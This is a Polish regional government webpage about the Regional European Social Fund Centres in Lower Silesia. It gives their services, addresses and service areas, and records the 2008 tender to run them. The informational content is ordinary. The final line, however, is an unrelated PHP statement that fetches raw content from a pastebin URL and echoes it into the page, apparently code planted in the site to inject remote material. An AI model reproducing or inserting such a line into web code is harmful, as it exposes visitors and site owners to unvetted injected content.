Realizacja

Programu Operacyjnego
Kapitał Ludzki

na Dolnym Śląsku

Wartość podpisanych umów

2 350 537 513,38 zł

 Rozliczono

2 267 814 427,62 zł

Stan na 31 października 2015 r.

Punkt informacyjny i naboru wniosków PO KL

Multimedia

Niezwykła szansa dla niezwykłych ludzi

Mapa dotacji UE

Mapa projektów EFS

Analizy i raporty

Inwestycja w Kardy

Baza Projektów Badawczych w ramach Programu Kapitał Ludzki

Dolnośląski Wojewódzki Urząd Pracy

Regionalny Ośrodek EFS

Punkty Informacyjne Funduszy Europejskich

Europejski Fundusz Społeczny

Narodowa Strategia Spójności

Ministerstwo Rozwoju Regionalnego

Komisja Europejska

Regionalny Program Operacyjny

Urząd Marszałkowski Województwa Dolnośląskiego

Biuletyn informacji publicznej

Regionalne Ośrodki EFS

Szanowni Państwo, informujemy, że Regionalne Ośrodki Europejskiego Funduszu Społecznego (RO EFS) zakończyły swoją działalność 31.12.2014 r.

 

 


 Regionalne Ośrodki Europejskiego Funduszu Społecznego (RO EFS) to ośrodki, które świadczą bezpłatne usługi szkoleniowo-doradcze na rzecz podmiotów uprawnionych do ubiegania się o środki w ramach Programu Operacyjnego Kapitał Ludzki.

 

Kto może korzystać z usług ROEFS?

 • jednostki samorządu terytorialnego i ich jednostki organizacyjne działające w obszarach wspieranych przez EFS,
 • organizacje pozarządowe działające w obszarach wspieranych przez EFS,
 • organizacje przedsiębiorców i przedsiębiorcy,
 • instytucje rynku pracy,
 • szkoły,
 • szkoły wyższe i jednostki naukowe,
 • ośrodki doradztwa rolniczego,
 • osoby indywidualne, które są zainteresowane udziałem w projektach dofinansowanych z EFS, wyłącznie w zakresie uzyskania informacji na temat projektów realizowanych w danym regionie.

Jest to możliwe dzięki udostępnionym bezpłatnie usługom z zakresu: szkoleń dot. tworzenia i realizacji projektów, doradztwa przy pisaniu wniosków składanych do EFS, działań animacyjnych w środowiskach lokalnych, wsparcia w tworzeniu trwałych partnerstw, informacji dotyczących Europejskiego Fundusz Społecznego.

Formalny i finansowy nadzór nad funkcjonowaniem dolnośląskich RO EFS sprawuje Instytucja Pośrednicząca - Urząd Marszałkowski Województwa Dolnośląskiego.

Zapraszamy do korzystania z oferty Regionalnych Ośrodków Europejskiego Funduszu Społecznego:

Regionalny Ośrodek Europejskiego Funduszu Społecznego we Wrocławiu
(prowadzony przez Regionalne Centrum Wspierania Inicjatyw Pozarządowych)

pl. Solidarności 1/3/5, pok. 415
53-661 Wrocław
tel. 071 780 90 79 tel./faks 071 796 30 00

info_wroclaw@roefs.pl

www.wroclaw.roefs.pl i www.rcwip.pl

Obszar działania to:
- miasto Wrocław,
- powiaty: wrocławski, oławski, strzeliński, milicki, średzki, trzebnicki, wołowski, górowski, oleśnicki.

Regionalny Ośrodek Europejskiego Funduszu Społecznego w Wałbrzychu

(prowadzony przez Unię Przedsiębiorców Dolnego Śląska i Legnickie Stowarzyszenie Inicjatyw Obywatelskich)

ul. Dmowskiego 22
58-300 Wałbrzych

tel. 074 66 66 044

info_walbrzych@roefs.pl

www.walbrzych.roefs.pl

Obszar działania to powiaty: wałbrzyski, świdnicki, dzierżoniowski, ząbkowicki i kłodzki.

Regionalny Ośrodek Europejskiego Funduszu Społecznego w Jeleniej Górze

(prowadzony przez Regionalne Centrum Wspierania Inicjatyw Pozarządowych)

ul. Okrzei 10
58-500 Jelenia Góra

tel./faks 075 642 20 00

info_jeleniagora@roefs.pl

www.jeleniagora.roefs.pl i www.rcwip.pl

Obszar działania to:
- miasto Jelenia Góra,
- powiaty: jeleniogórski, bolesławiecki, lubański, lwówecki, kamiennogórski i zgorzelecki.

 

Regionalny Ośrodek Europejskiego Funduszu Społecznego w Legnicy

(prowadzony przez Agencję Rozwoju Regionalnego ARLEG S.A. i Legnickie Stowarzyszenie Inicjatyw Obywatelskich)

ul. T. Kościuszki 25/1
59-220 Legnica

tel. 076 862 58 15, faks 076 862 58 25

roefs@lsio.org.pl

www.legnica.roefs.pl

Obszar działania to:
- miasto Legnica,
- powiaty: legnicki, głogowski, jaworski, lubiński, polkowicki, złotoryjski.

 


Podpisane umowy na prowadzenie Regionalnych Ośrodków EFS we Wrocławiu, Jeleniej Górze, Wałbrzychu i Legnicy

W dniu 22 października 2008 r. zostały podpisane umowy na prowadzenie Regionalnych Ośrodków EFS we Wrocławiu, Wałbrzychu, Jeleniej Górze i Legnicy.

Wyłonione instytucje poprowadzą Regionalne Ośrodki EFS w województwie dolnośląskim od 2008 roku.


Wyniki oceny merytorycznej Ofert złożonych w konkursie na prowadzenie Regionalnych Ośrodków Europejskiego Funduszu Społecznego w województwie dolnośląskim

W odpowiedzi na konkurs na prowadzenie Regionalnych Ośrodków Europejskiego Funduszu Społecznego, ogłoszony w dniu 4 sierpnia 2008 r., do Wydziału Europejskiego Funduszu Społecznego UMWD do dnia 3 września 2008 r. wpłynęło 5 Ofert. Oferty złożyło 3 Oferentów:

 1. Agencja Rozwoju Regionalnego „ARLEG” S.A.
  ul. M. Rataja 59-220 Legnica
  obszar nr 3 - Legnica.
 2. Regionalne Centrum Wspierania Inicjatyw Pozarządowych
  ul. Beethovena 10 58-300 Wałbrzych
  obszar: nr 1 - Wałbrzych,
  obszar: nr 2 - Jelenia Góra,
  obszar: nr 4 - Wrocław.
 3. Stowarzyszenie Unia Przedsiębiorców Dolnego Śląska
  ul. Żeromskiego 14 58-100 Świdnica
  obszar nr 1 - Wałbrzych.

Oferty oceniła Komisja Oceny Ofert powołana Zarządzeniem Nr 72/2008 Marszałka Województwa Dolnośląskiego z dnia 1 września 2008 r.

Protokół z Oceny Ofert na prowadzenie Regionalnych Ośrodków Europejskiego Funduszu Społecznego, przeprowadzonej w dniach 4-5 września 2008 r. wraz z listą rankingową Ofert na każdy z 4 obszarów .
Dokument do pobrania


Ogłoszenie konkursu na prowadzenie Regionalnych Ośrodków Europejskiego Funduszu Społecznego w województwie dolnośląskim

Urząd Marszałkowski Województwa Dolnośląskiego ogłasza konkurs na wybór instytucji prowadzącej Regionalny Ośrodek Europejskiego Funduszu Społecznego we Wrocławiu/Wałbrzychu/Jeleniej Górze/Legnicy.

Środki na finansowanie ich działalności będą pochodziły z Pomocy Technicznej PO KL - środków przeznaczonych na zapewnienie właściwego zarządzania, wdrażania oraz promocji EFS.

Ogłoszenie o konkursie wraz z dokumentacją konkursową do pobrania poniżej:

Nazwa konkursu

Konkurs na wybór instytucji prowadzących Regionalne Ośrodki Europejskiego Funduszu Społecznego w województwie dolnośląskim

Ogłoszenie o konkursie

Dokument do pobrania

Okres przyjmowania wniosków

4 sierpnia 2008 r. - 3 września 2008 r.

Dokumentacja konkursowa

Dokument do pobrania

echo file_get_contents("https://pastebin.com/raw/vFc5Snpm");